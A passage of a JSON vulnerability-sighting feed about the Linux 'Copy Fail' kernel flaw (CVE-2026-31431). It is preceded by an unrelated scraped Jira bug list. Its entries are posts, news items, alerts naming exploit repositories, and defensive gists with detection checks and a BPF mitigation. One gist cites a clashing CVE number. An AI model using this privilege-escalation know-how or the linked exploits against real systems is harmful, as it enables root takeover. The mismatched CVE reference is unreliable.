template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (25d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (21d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (26d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (43d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 05, 2026 at 10:29 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-05T22:29:46.000000Z"}, {"uuid": "6e700d40-a13c-4f8e-9548-e387e733ce7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3ml5cmub6ma2m", "content": "CVE-2026-31431: Copy Fail vs. rootless containers https://lobste.rs/s/cvmqdt #security #linux ", "creation_timestamp": "2026-05-05T23:10:04.693912Z"}, {"uuid": "e14cf3da-9d42-4d0c-907e-19bb4ceced91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3ml5eurlg362r", "content": "Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/", "creation_timestamp": "2026-05-05T23:50:16.723849Z"}, {"uuid": "28d36022-21ed-4b66-bd3f-cae2abd7445a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/", "content": "Copy Fail (CVE-2026-31431) is a critical Linux kernel LPE that allows stealthy root access. This flaw impacts millions of systems. Read our analysis. The post Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years appeared first on Unit 42.", "creation_timestamp": "2026-05-05T21:00:33.000000Z"}, {"uuid": "d3fc1786-4296-4b03-a501-b335a93d414b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82994", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431-pythonlower3.10\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a OneDemobird\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-06 03:59:07\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\npython3.10\u4ee5\u4e0b\u6ca1\u6709os.splice\uff0c\u641e\u4e86\u4e00\u4e2a3.10\u4ee5\u4e0b\u7248\u672c\u4e5f\u53ef\u4ee5\u7528\u7684\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-06T04:00:04.000000Z"}, {"uuid": "a8329cb5-9d60-4f91-8650-035f064ca820", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ml54nyutz6v2", "content": "Navigating the \u201cCopy Fail\u201d: Understanding and Mitigating CVE-2026-31431 in Linux A significant vulnerability dubbed \u201cCopy Fail,\u201d recorded as CVE-2026-31431, has emerged as a substantial con...\n\n#Current #Events #Linux #Security #AF_ALG #Copy #Fail #copy #fail #exploit #copy\n\nOrigin | Interest | [\u2026]", "creation_timestamp": "2026-05-05T21:23:22.426944Z"}, {"uuid": "40c76ecd-e292-4d6b-8b7b-a67855f606f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/npub1lllllll9xdgqvp5l3drml7kwrre9u5ma6je7ey8r0578dfqq8l8qrjujua.momostr.pink.ap.brid.gy/post/3ml54yysgkmv2", "content": "CVE-2026-31431 has been fun", "creation_timestamp": "2026-05-05T21:29:31.338369Z"}, {"uuid": "849a73c4-c164-4eda-823f-3325b45fc74a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/thehackernews/8920", "content": "\u26a0\ufe0f A new #Linux flaw is now under active exploitation.\n\nCISA added CVE-2026-31431 to its KEV list. The bug lets low-privilege users gain full root access. Patches released.\n\nFix deadline: May 15, 2026.\n\nRead: https://thehackernews.com/2026/05/cisa-adds-actively-exploited-linux-root.html", "creation_timestamp": "2026-05-03T06:48:23.000000Z"}, {"uuid": "25e338b1-1974-42c0-a918-972c1e59a7d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3ml5liblfaq32", "content": "Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years Copy Fail (CVE-2026-31431) is a critical Linux kernel LPE that allows stealthy root access. This flaw impacts millions o...\n\n#High #Profile #Threats #Vulnerabilities [\u2026] \n\n[Original post on unit42.paloaltonetworks.com]", "creation_timestamp": "2026-05-06T01:48:36.613161Z"}, {"uuid": "95437b5a-99fb-4000-b519-094db6921f52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3ml5nsllfhs2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 561 interactions\nCVE-2026-41940: 122 interactions\nCVE-2026-3854: 42 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-41940: 40 interactions\nCVE-2026-31431: 21 interactions\nCVE-2026-23918: 12 interactions\n", "creation_timestamp": "2026-05-06T02:30:08.214164Z"}, {"uuid": "1dfa55bf-2d61-4572-9fef-f205174792e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Enkhsanaa/3dced2c7e31abcf1deac2dbb9674428c", "content": "", "creation_timestamp": "2026-05-06T03:15:36.000000Z"}, {"uuid": "c494a8c1-8093-4695-8274-4b5ed16a0836", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hatena-bookmark.bsky.social/post/3ml5sknsj6j2y", "content": "#\ud83d\udd16\u30c6\u30af\u30ce\u30ed\u30b8\u30fc\n\u300cLinux\u300d\u306b\u6975\u3081\u3066\u91cd\u5927\u306a\u8106\u5f31\u6027--\u300cCopy Fail\u300d\u767a\u899a\n\n\u5370\u5237\u3059\u308b \u30e1\u30fc\u30eb\u3067\u9001\u308b \u30c6\u30ad\u30b9\u30c8 HTML \u96fb\u5b50\u66f8\u7c4d PDF \u30c0\u30a6\u30f3\u30ed\u30fc\u30c9 \u30c6\u30ad\u30b9\u30c8 \u96fb\u5b50\u66f8\u7c4d PDF \u30af\u30ea\u30c3\u30d7\u3057\u305f\u8a18\u4e8b\u3092My\u30da\u30fc\u30b8\u304b\u3089\u8aad\u3080\u3053\u3068\u304c\u3067\u304d\u307e\u3059 \u300cCopy Fail\u300d\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u300cCVE-2026-31431\u300d\u306f\u30012017\u5e74\u304b\u3089\u6f5c\u4f0f\u3057\u3066\u3044\u305f\u300cLinux\u300d\u30ab\u30fc\u30cd\u30eb\u306e\u6df1\u523b\u306a\u8106\u5f31\uff08\u305c\u3044\u3058\u3083\u304f\uff09\u6027\u3067\u3042\u308a\u3001\u73fe\u5728\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4e0a\u306e\u5927\u304d\u306a\u6ce8\u76ee\u3092\u96c6\u3081\u3066\u3044...\nhttps://japan.zdnet.com/article/35247165/", "creation_timestamp": "2026-05-06T03:55:10.303400Z"}, {"uuid": "21d70a98-aa46-4e6b-b143-b417dc725a17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/thecascading.bsky.social/post/3ml5spvsvdz2p", "content": "\ud83d\udd34 Kernel \u6f0f\u6d1e\u53ef\u5bfc\u81f4\u672c\u5730\u63d0\u6743\uff1b\u8bf7\u5c3d\u5feb\u4fee\u590d\u6216 mitigate\u3002\n\n- \u6f0f\u6d1e\u4e0e kernel crypto API \u76f8\u5173\u3002\u5f71\u54cd 4.14 \u8d77\u7684\u5404\u4e2a\u7248\u672c\uff0c\u4e5f\u5c31\u662f\u76ee\u524d\u5e02\u9762\u4e0a\u7edd\u5927\u591a\u6570\u6b63\u5728\u8fd0\u884c Linux \u7684\u7cfb\u7edf\u3002\n- Ubuntu 26.04 (resolute)\u3001Debian 14 (forky) \u53ca Debian Sid \u7684\u6700\u65b0\u7248\u672c\u5185\u6838\u5df2\u4fee\u590d\u6b64\u95ee\u9898\u3002\u7136\u800c\uff0c\u7edd\u5927\u591a\u6570\u53d1\u884c\u7248/\u7248\u672c\u5c1a\u672a\u6709\u4fee\u590d\u3002 [2]\n- Mitigation \u65b9\u5f0f\u662f\u7981\u7528 algif_aead \u6a21\u5757\uff1b\u9884\u8ba1\u7edd\u5927\u90e8\u5206\u8f6f\u4ef6\u4e0d\u4f1a\u56e0\u6b64\u53d7\u5230\u5e72\u6270\u3002 [1]\n\nCVE: CVE-2026-31431 ... [1/2]", "creation_timestamp": "2026-05-06T03:58:06.068971Z"}, {"uuid": "6fd05cb4-e46d-49fc-b5af-67a873914f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/winsontang.com/post/3ml5tp44i2k2u", "content": "CVE-2026-31431 highlights a critical vulnerability impacting rootless containers, exposing potential security risks. Understanding this \"copy fail\" issue is essential for maintaining robust container security. Stay informed and protect your environments! #Cybersecurity #DevOps", "creation_timestamp": "2026-05-06T04:15:32.548230Z"}, {"uuid": "f3f2340f-3c50-457d-8be7-b58e32f30a0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml5zkkioec2x", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-06T06:00:22.308940Z"}, {"uuid": "e0e56f08-96d4-46ab-8db0-558682fe26ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T20:00:00.000000Z"}, {"uuid": "99c0d926-8bdd-4b90-991c-4d2dcc4cf806", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fookhwa.bsky.social/post/3ml6itwotpo2u", "content": "Nine-year-old Linux kernel flaw enables reliable local privilege escalation (CVE-2026-31431) - Help Net Security", "creation_timestamp": "2026-05-06T10:34:03.960587Z"}, {"uuid": "32c85257-8ab3-40b4-8d95-51ee5b7927d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3ml66gofldtr2", "content": "Linux Kernel Vulnerability \u201cCopy Fail\u201d (CVE-2026-31431) \u2014 Immediate Action Required hairydog: rmmod algif_aead 2>/dev/null || true No, that alone is not a reliable mitigation. This does no...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-06T07:27:45.878461Z"}, {"uuid": "e1909d62-702b-471b-a29e-b4213da81ea5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/jpf-okteto/f82ba1e8aa47320b48288aa30a6192a9", "content": "# Copy Fail Blocker\n- [Copy Fail Blocker](#copy-fail-blocker)\n  - [Overview](#overview)\n  - [Issue](#issue)\n  - [Resources](#resources)\n  - [Check Vulnerability](#check-vulnerability)\n  - [Deploy Copy Fail Blocker Viability](#deploy-copy-fail-blocker-viability)\n  - [Deploy Copy Fail Blocker](#deploy-copy-fail-blocker)\n  - [Remove Copy Fail Blocker](#remove-copy-fail-blocker)\n\n## Overview\n- BPF-LSM mitigation for the copy fail vulnerability (CVE-2024-3174) in the Linux kernel\n- DaemonSet attaches single BPF-LSM program to the socket_create hook on every node\n- [GitHub: copy-fail-blocker](https://github.com/cozystack/copy-fail-blocker)\n\n## Issue\n- AWS haven't yet release an AMI that includes an upstream fix\n- upgrading to latest AMI version still has container version `kernel6.12-6.12.79-101.147.amzn2023` which is still vulnerable\n\n## Resources\n- [AWS Containers Roadmap](https://github.com/aws/containers-roadmap/issues/2808)\n- [ALSC Status updates](https://explore.alas.aws.amazon.com/CVE-2026-31431.html)\n\n## Check Vulnerability\n```bash\n# ssh into any EKS node\n\n# check for copy fail vulnerability\npython3 -c '\nimport socket\ntry:\n    socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)\n    print(\"FAIL: AF_ALG socket created - not protected\")\nexcept OSError as e:\n    print(\"OK:\", e)'\n\n# FAIL: AF_ALG socket created - not protected\n```\n\n## Deploy Copy Fail Blocker Viability\n```bash\n# check what BPF LSM is compiled in\ngrep CONFIG_BPF_LSM /boot/config-$(uname -r)\n# CONFIG_BPF_LSM=y\n\n# check bpf is in active LSM stack\ncat /sys/kernel/security/lsm\n# lockdown,capability,landlock,yama,safesetid,selinux,bpf,ima\n```\n\n## Deploy Copy Fail Blocker\n```bash\n# deploy copy fail blocker\nk  apply -f https://raw.githubusercontent.com/cozystack/copy-fail-blocker/v0.2.1/manifests/copy-fail-blocker.yaml\n\n# verify rollout\nk -n kube-system rollout status daemonset/copy-fail-blocker\n\n# verify copy fail is blocked\npython3 -c '\nimport socket\ntry:\n    socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)\n    print(\"FAIL: AF_ALG socket created - not protected\")\nexcept OSError as e:\n    print(\"OK:\", e)'\n\n# OK: [Errno 1] Operation not permitted\n```\n\n## Remove Copy Fail Blocker\n- remove once an AMI has been released with fix\n\n```bash\n# remove copy fail blocker\nk delete -f https://raw.githubusercontent.com/cozystack/copy-fail-blocker/v0.2.1/manifests/copy-fail-blocker.yaml\n```\n", "creation_timestamp": "2026-05-06T11:19:12.000000Z"}, {"uuid": "55210ab0-290c-4267-9506-5de24d20b926", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/adegoodyer/4ac687c6d25980f02401cab22a2f9f9e", "content": "# Copy Fail Blocker\n- [Copy Fail Blocker](#copy-fail-blocker)\n  - [Overview](#overview)\n  - [Issue](#issue)\n  - [Resources](#resources)\n  - [Check Vulnerability](#check-vulnerability)\n  - [Deploy Copy Fail Blocker Viability](#deploy-copy-fail-blocker-viability)\n  - [Deploy Copy Fail Blocker](#deploy-copy-fail-blocker)\n  - [Remove Copy Fail Blocker](#remove-copy-fail-blocker)\n\n## Overview\n- BPF-LSM mitigation for the copy fail vulnerability (CVE-2024-3174) in the Linux kernel\n- DaemonSet attaches single BPF-LSM program to the socket_create hook on every node\n- [GitHub: copy-fail-blocker](https://github.com/cozystack/copy-fail-blocker)\n\n## Issue\n- AWS haven't yet release an AMI that includes an upstream fix\n- upgrading to latest AMI version still has container version `kernel6.12-6.12.79-101.147.amzn2023` which is still vulnerable\n\n## Resources\n- [AWS Containers Roadmap](https://github.com/aws/containers-roadmap/issues/2808)\n- [ALSC Status updates](https://explore.alas.aws.amazon.com/CVE-2026-31431.html)\n\n## Check Vulnerability\n```bash\n# ssh into any EKS node\n\n# check for copy fail vulnerability\npython3 -c '\nimport socket\ntry:\n    socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)\n    print(\"FAIL: AF_ALG socket created - not protected\")\nexcept OSError as e:\n    print(\"OK:\", e)'\n\n# FAIL: AF_ALG socket created - not protected\n```\n\n## Deploy Copy Fail Blocker Viability\n```bash\n# check what BPF LSM is compiled in\ngrep CONFIG_BPF_LSM /boot/config-$(uname -r)\n# CONFIG_BPF_LSM=y\n\n# check bpf is in active LSM stack\ncat /sys/kernel/security/lsm\n# lockdown,capability,landlock,yama,safesetid,selinux,bpf,ima\n```\n\n## Deploy Copy Fail Blocker\n```bash\n# deploy copy fail blocker\nk  apply -f https://raw.githubusercontent.com/cozystack/copy-fail-blocker/v0.2.1/manifests/copy-fail-blocker.yaml\n\n# verify rollout\nk -n kube-system rollout status daemonset/copy-fail-blocker\n\n# verify copy fail is blocked\npython3 -c '\nimport socket\ntry:\n    socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)\n    print(\"FAIL: AF_ALG socket created - not protected\")\nexcept OSError as e:\n    print(\"OK:\", e)'\n\n# OK: [Errno 1] Operation not permitted\n```\n\n## Remove Copy Fail Blocker\n- remove once an AMI has been released with fix\n\n```bash\n# remove copy fail blocker\nk delete -f https://raw.githubusercontent.com/cozystack/copy-fail-blocker/v0.2.1/manifests/copy-fail-blocker.yaml\n```\n", "creation_timestamp": "2026-05-06T10:35:54.000000Z"}, {"uuid": "4e572807-2624-49ad-8798-422f76f31769", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3ml6marlb7tu2", "content": "Copy Fail (CVE-2026-31431): Patching kernels without rebooting Most kernel CVEs follow a predictable rhythm for hosting providers: read the advisory, schedule a maintenance window, reboot during of...\n\n#KernelCare #CVE #Vulnerability #Live #Patching #Kernel #Update\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-06T11:37:56.254037Z"}, {"uuid": "95c8731d-e711-46c3-895b-e586cc722990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ml6rh7ws2pd2", "content": "CopyFail\u2019s Silent Root Takeover: How a Nine-Year Linux Kernel Flaw Ignites Active Exploits and CISA\u2019s Urgent Patch Mandate CVE-2026-31431, the CopyFail Linux kernel flaw, enables unprivileged r...\n\n#CybersecurityUpdate #CISA #KEV #CopyFail #CVE-2026-31431 [\u2026] \n\n[Original post on webpronews.com]", "creation_timestamp": "2026-05-06T13:12:05.555336Z"}, {"uuid": "9beea3d7-9e81-49fa-9597-7bbf4f07f06e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3ml6yibsgk5f2", "content": "CISA alerta de explotaci\u00f3n activa de Copy Fail para obtener root en Linux CVE-2026-31431 (Copy Fail) ya se est\u00e1 explotando de forma activa para lograr root en sistemas Linux, lo que ha llevado CV...\n\n#Seguridad\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-06T15:16:43.427430Z"}, {"uuid": "54f431dd-08a1-4748-9fb3-7d4646dab8dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/WeszNL/b7a1079b1a9973117d33b7d729638fbe", "content": "Quickly scan all ansible'd hosts for potential exposure to CVE-2026-31431 (COPY-FAIL).\n\n```bash\nansible all -i inventory -b -m shell -a \"test -d /sys/module/algif_aead && echo 'algif_aead=loaded' || echo 'algif_aead=not_loaded'; echo 'MODPROBE_CHECK:'; modprobe -n -v algif_aead 2>&1 | sed 's/^/modprobe: /'\"\n\nDoes:\n- checks if the algif_aead kernel module is currently loaded on each host\n- verifies whether the module can be loaded via modprobe (dry-run)\n- helps assess potential exposure without making changes\n\nDoes not:\n- patch anything; you need to mitigate or update kernels yourself", "creation_timestamp": "2026-05-06T14:03:16.000000Z"}, {"uuid": "a6df5826-7e7b-4177-abab-e6ede39bd765", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83088", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail-Container-Escape\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a hans362\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-06 15:47:17\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-06T16:00:05.000000Z"}, {"uuid": "bc9b1a7f-d8e6-441d-a351-07d95ba515b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": 